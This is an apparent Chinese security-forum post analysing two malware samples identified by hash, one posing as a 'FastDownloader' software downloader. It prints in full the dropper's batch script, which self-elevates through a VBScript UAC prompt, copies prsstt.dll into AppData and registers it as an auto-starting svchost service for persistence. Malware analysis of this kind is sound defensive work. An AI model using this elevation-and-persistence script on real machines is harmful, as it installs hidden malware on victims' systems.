本帖最后由 DisaPDB 于 2024-1-11 16:13 编辑
10b9d7ea6c2b261ebb029d559c5314ac0f0b507af43baba32080cd0aeee2f7aa.exe是自解压文件
Downloader内含有.bat,内容如下:
复制自解压包内的prsstt.dll 到用户Appdata目录,然后创建一个名为 QQQRRR 的服务并启动它实现持久化 剩下几个帮不了你 - [url=home.php?mod=space&uid=331734]@echo[/url] OFF & CD /D "%~DP0"
- >NUL 2>&1 reg.exe query "HKU\S-1-5-19" || (
- ECHO SET UAC = CreateObject^("Shell.Application"^) > "%TEMP%\Getadmin.vbs"
- ECHO UAC.ShellExecute "%~f0", "%1", "", "runas", 1 >> "%TEMP%\Getadmin.vbs"
- "%TEMP%\Getadmin.vbs"
- DEL /f /q "%TEMP%\Getadmin.vbs" 2>NUL
- Exit /b
- )
- cd /d "%~dp0"
- echo y|xcopy prsstt.dll "%localappdata%\jjjjjj"
- sc create QQQRRR binpath= "%SystemRoot%\System32\svchost.exe -k QQQRRREX" start= auto type= own
- reg add HKLM\SYSTEM\CurrentControlSet\Services\QQQRRR /v WOW64 /t reg_dword /d 1 /f
- reg add HKLM\SYSTEM\CurrentControlSet\Services\QQQRRR\Parameters /v ServiceDll /t reg_expand_sz /d "%localappdata%\jjjjjj\prsstt.dll" /f
- reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Svchost" /v QQQRRREX /t reg_multi_sz /d "QQQRRR" /f
- sc config QQQRRR start= auto
- sc start QQQRRR
复制代码 4fefdcdf7cc5ef4f25c5edcf2054e34eb21a62ce6d38b0b03e9fd07fd59abfbf.exe
- 1 VERSIONINFO
- FILEVERSION 3,2,0,8
- PRODUCTVERSION 3,2,0,8
- FILEOS 0x40004
- FILETYPE 0x1
- {
- BLOCK "StringFileInfo"
- {
- BLOCK "080404b0"
- {
- VALUE "CompanyName", "-"
- VALUE "FileDescription", " "
- VALUE "FileVersion", "3.2.0.8"
- VALUE "InternalName", "FastDownloader.exe"
- VALUE "LegalCopyright", "Copyright (C) 2018"
- VALUE "OriginalFilename", "FastDownloader.exe"
- VALUE "ProductName", "软件下载器"
- VALUE "ProductVersion", "3.2.0.8"
- }
- }
- BLOCK "VarFileInfo"
- {
- VALUE "Translation", 0x0804 0x04B0
- }
- }
复制代码
|